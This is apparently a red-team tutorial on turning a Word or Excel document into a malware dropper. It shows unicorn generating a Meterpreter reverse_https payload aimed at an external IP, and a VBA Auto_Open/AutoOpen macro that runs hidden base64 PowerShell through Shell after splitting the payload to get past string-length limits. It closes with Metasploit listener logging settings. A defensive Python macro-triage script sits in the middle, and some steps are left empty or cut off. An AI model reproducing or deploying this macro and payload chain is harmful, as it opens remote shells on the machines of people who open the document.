Clone unicorn and cd to it:
```sh
$ git clone https://github.com/trustedsec/unicorn
$ cd unicorn
```
Generate powershell payload via unicorn:
```sh
$ python unicorn.py windows/meterpreter/reverse_https 126.96.36.199 443
[*] Generating the payload shellcode. This could take a few seconds/minutes as we create the shellcode...
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create a listener.
```
Then you can find your payload in the powershell_attack.txt file. Copy it and paste it into the macro in your doc file.
When you try to insert the payload generated by unicorn, Microsoft Word/Excel might throw an error about string length. You can bypass it: break the string into multiple substrings and then concatenate them. Now your macro should look like this:
```vb
Sub Auto_Open()
Dim exec As String
str1 = "powershell -window hidden -e JABCAGMAVQA...ABBAGw"
...
str31 = "UALgBHAGUAdABCA...2ADQAX"
str32 = "ABXAGkAbgB...ADsAfQA="
exec = str1 + str2 + str3 + str4 + str5 + str6 + str7 + str8 + str9 + str10 + str11 + str12 + str13 + str14 + str15 + str16 + str17 + str18 + str19 + str20 + str21 + str22 + str23 + str24 + str25 + str26 + str27 + str28 + str29 + str30 + str31 + str32
Shell (exec)
End Sub

Sub AutoOpen()
Auto_Open
End Sub
```
With both Auto_Open and AutoOpen defined, the payload is able to execute in different versions of Microsoft Word.
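From the defender's side, the same three traits (an auto-exec procedure, a Shell call, and a `-e` base64 argument reassembled from split literals) are what a macro triage script looks for. The following is an added example, not part of the original post or of unicorn; the sample macro and its harmless encoded command are constructed here, and the regexes are a deliberately small VBA subset:

```python
import base64
import re

# Constructed sample macro, shaped like the Auto_Open/strN/Shell macro above.
# The -e argument is the UTF-16LE base64 of a harmless Write-Host line.
_HARMLESS = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16le")).decode()
SAMPLE_MACRO = f'''Sub Auto_Open()
Dim exec As String
str1 = "powershell -window hidden -e {_HARMLESS[:20]}"
str2 = "{_HARMLESS[20:]}"
exec = str1 + str2
Shell (exec)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
'''

AUTO_EXEC = re.compile(r"^\s*Sub\s+(Auto_?Open|Document_Open|Workbook_Open)\b", re.I | re.M)
LITERAL = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)
CONCAT = re.compile(r"^\s*(\w+)\s*=\s*((?:\w+\s*[+&]\s*)+\w+)\s*$", re.M)
SHELL = re.compile(r"\bShell\s*\(?\s*(\w+)", re.I)
ENCODED = re.compile(r"powershell\b.*?\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

def analyze_macro(vba: str) -> dict:
    """Reassemble split string literals, find the Shell() argument and decode -e."""
    literals = dict(LITERAL.findall(vba))
    resolved = {}
    for name, expr in CONCAT.findall(vba):          # exec = str1 + str2 + ...
        parts = re.split(r"\s*[+&]\s*", expr)
        resolved[name] = "".join(literals.get(p) or resolved.get(p, "") for p in parts)
    shell = SHELL.search(vba)
    command = None
    if shell:
        command = resolved.get(shell.group(1)) or literals.get(shell.group(1))
    decoded = None
    enc = ENCODED.search(command or "")
    if enc:
        try:
            decoded = base64.b64decode(enc.group(1)).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            decoded = None
    return {
        "auto_exec": sorted(set(AUTO_EXEC.findall(vba))),
        "shell_call": shell is not None,
        "command": command,
        "decoded_command": decoded,
        "hidden_window": bool(re.search(r"-w(?:indow(?:style)?)?\s+hidden", command or "", re.I)),
        # All three together is the macro-dropper pattern this page describes.
        "suspicious": bool(shell and decoded and AUTO_EXEC.search(vba)),
    }
```

Tools such as olevba already extract the VBA source from a document; this script only covers the step from extracted source to a decoded command.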
Sometimes it's a good idea to use a staged payload like the one described above, sometimes not. If you have a small one (for example, you just want to drop an nc-like shell) you can use unicorn again. Write a script in PowerShell, save it, and then just run:
```sh
$ python unicorn.py <path to your script>
```
This will generate your payload to paste into your doc file.
It’s always better to start msfconsole in screen. So run:
It’s a clever idea to enable logging in metasploit because you don’t want to miss something later:
```
msf> spool mylog.log
```
Now let's make Metasploit a bit more talkative, so set:
```
msf> set ConsoleLogging true
msf> set LogLevel 5
msf> set SessionLogging true
msf> set TimestampOutput true
```
You can change your prompt, for example, to: